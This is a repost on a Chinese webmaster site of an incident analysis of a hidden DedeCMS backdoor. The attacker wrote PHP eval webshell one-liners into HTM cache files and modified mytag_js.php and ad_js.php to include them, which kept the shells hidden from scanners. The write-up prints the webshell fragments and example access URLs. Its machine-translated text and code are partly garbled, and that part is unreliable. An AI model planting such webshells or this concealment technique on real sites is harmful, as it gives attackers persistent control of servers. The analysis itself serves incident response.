隐藏后门的特殊DEDE方法(dedecms漏洞90sec.php文件)汇站网 - 汇站网
首页 站长学院 建站教程 织梦教程 正文
我要投稿

隐藏后门的特殊DEDE方法(dedecms漏洞90sec.php文件)

织梦教程
2021-08-23 0 1,251

该单位一个站点使用的 DEDECM 今天由一家黑色的 broad getshell 公司提交给 wooyun.com


为了恢复黑阔入侵的技术,Guigegetshell 测试没有成功。你有没有得到一次机会就不会再成功了?
但是,我只能打包代码。我只能用各种 webshell 扫描仪扫描 data/tplcache/xxxxx.inc 文件。文件代码如下:

{dede:php}file_put_contents(90sec.php,'’);{/dede:php}

但是我在所有的 web 目录中都找不到 90sec.php 文件。一位朋友指出可能是其他文件,包括这个文件。然后我使用 Seay 的代码审计工具定义了各种关键字,但仍然找不到它们。
最后,老板转到 data/cache 目录,找到几个 HTM 文件,myad-1.HTMmyad-16.HTMmytag-1208.HTM 等。用以下代码打开这些 HTML 文件:
document.write(“dedecmsisok@eval($_POST[cmd]);?>”);
Select Code
Copy
document.write(axxxxx);echoOK;@fclose($fp);?>);
Select Code
Copy
document.write(“$fp =@fopen(av.php,a);@fwrite($fp, eval($_POST[110])?>axxxxx’);echoOK’;@fclose($fp);?>”);
Select Code
Copy
document.write(“echodedecms 5.70day<br>guige,90sec.org;@preg_replace(/[copyright]/e,


看到这些文件真奇怪。我不知道黑阔想要什么??虽然代码看起来很熟悉,但 HTML 文件可以用作后门吗?想想我的朋友说的 include,然后结合前一段时间 getshell 漏洞攻击的细节,最后转到 plus/mytag_Js.php 文件。在这个文件中,我终于找到了一个黑色、宽阔、肆无忌惮的地方。主要代码如下:
看到上面的代码,我们应该知道黑阔有多邪恶。在生成的 HTM 格式缓存文件中编写各种类型的一句代码,然后修改 plus/ad_Js.phpmytag_Js.php 文件,包括 HTM 格式的缓存文件。这样,黑阔只需在菜刀中填写以下 URL 即可连接一句话
http://www.xxx.com/plus/mytag_ js.phpid=1208
http://www.xxx.com/plus/ad_ js.phpid=1
特定 ID 和文件名与 data/cache 目录中的 myad-1.htmmytag-1208.htm 相关。因此,各种 web shell 扫描仪不会扫描 web shell 后门文件,因为许多默认情况下不会扫描 HTM

转载请注明:汇站网 » 隐藏后门的特殊 DEDE 方法(dedecms 漏洞 90sec.php 文件)

收藏 (0)

微信扫一扫

支付宝扫一扫

点赞 (0)

免责 声明

本资源仅用于个人 学习和研究使用,禁止用于任何商业环境!

 1.  本网站名称:汇站网
 2.  本站永久网址:https://www.huizhanii.com/
 3.  本站所有资源来源于网友投稿和高价 购买,所有资源仅对编程人员及源代码爱好者开放下载做参考和研究及学习,本站不提供任何技术服务 !
 4.  本站所有资源的展示图片和信息不代表本站的立场 !本站只是储蓄平台及搬运
 5.  下载者禁止在服务器和虚拟机下进行搭建运营,本站 所有资源不支持联网运行!只允许调试,参考和研究!!!!
 6.  未经原版权作者许可,禁止用于任何 商业环境,任何人不得擅作它用,下载者不得用于违反国家法律,否则发生的一切法律后果自行承担!
 7.  为尊重作者版权,请在下载24小时 内删除!请购买原版授权作品,支持你喜欢的作者,谢谢!
 8.  若资源侵犯了您的合法权益, 请持 您的版权证书和相关原作品信息来信通知我们请来信     通知我们 我们会及时删除,给您带来的不便,我们深表歉意!
 9.  如下载链接失效、广告或者压缩包 问题请联系站长处理!
 10.  如果你也有好源码或者教程,可以 发布到网站,分享有金币奖励和额外收入!
 11.  本站资源售价只是赞助,收取费用 仅维持本站的日常运营所需!
 12.  因源码具有可复制性,一经赞助 ,不得以任何形式退款。
 13.  更多详情请点击查看

汇站网 织梦教程 隐藏后门的特殊DEDE方法(dedecms漏洞90sec.php文件) https://www.huizhanii.com/15232.html

汇站

站长资源下载中心-找源码上汇站

上一篇: 织梦DEDE网站首页被恶意篡改怎么办?
下一篇: 织梦Dede去掉index.html方法
常见问题

如何下载?

  • 如果付款后没有弹出下载页面,多刷新几下,有问题联系客服!
查看详情

免费下载或者VIP会员专享资源能否直接商用?

  • 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。
查看详情

相关文章

织梦缩略图失真模糊的解决方法
织梦缩略图失真模糊的解决方法
织梦教程
汇站
4年前 614
修改dedecms添加栏目时“文章命名规则”默认路径
修改dedecms添加栏目时“文章命名规则”默认路径
织梦教程
汇站
4年前 488
基于DEDECMS的php脚本限制的设置方法
基于DEDECMS的php脚本限制的设置方法
织梦教程
汇站
4年前 4
用dedecms建立英语工作站的诀窍是什么
用dedecms建立英语工作站的诀窍是什么
织梦教程
汇站
4年前 813
猜你喜欢
发表评论
暂无评论
  随机评论   表情   下载本站到电脑桌面


表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情 表情
 登录后评论
联系官方客服

为您解决烦忧 - 24小时在线 专业服务

联系官方客服 在线提交工单
热门评论
  • 相逢是首歌:

    很好

  • tophot:

    挺好的啊,下载看看

  • 小手一抖:

    汇站网资源很全面啊!支持了。

  • 随心所愿:

    可看见

  • Cat Paati~~:

    今天刚发现原来还有免费下载源码的地方给个赞

    • 热门文章
    热门标签
    广告招租 到期时间:
    终身VIP会员限时钜惠

    (汇站网)一个专注站长资源的平台网站,提供最新的网站模板和整站源码,内容包含各类精品网页模板,企业网站模板,网站模板,DIV+CSS模板,织梦模板,帝国cms模板,discuz模板,wordpress模板,个人博客论坛模板,上千种免费网页模板下载尽在汇站网.找源码上汇站.huizhanii.com

    关于
    合作

    微信公众号

    微信小程序

    | 今天是: | 您的IP地址是: | 在线听歌

    严正声明:杜绝利用本站资源进行触犯国家法律法规,下载者如触犯本站声明和相关条款,所产生的一切后果由下载者自行承担!下载既是认同本站声明,请悉知!

    本站以用户的需求为基础,将最有价值的资源分享给编程人员及源代码爱好者,但仅供调试、学习和研究。禁止联网运营和商业环境使用,请在24小时内删除!为尊重作者版权,请购买原版作品!

    Copyright © 2022-汇站网-huizhanii.com& WordPress Theme. All rights reserved.     网站地图 粤公安网备888888888号 粤ICP备2022151201号本页生成数据库 23 次查询,耗时 1.864 秒,使用 21.25MB 内存
    首页 联系客服 菜单 会员 免责声明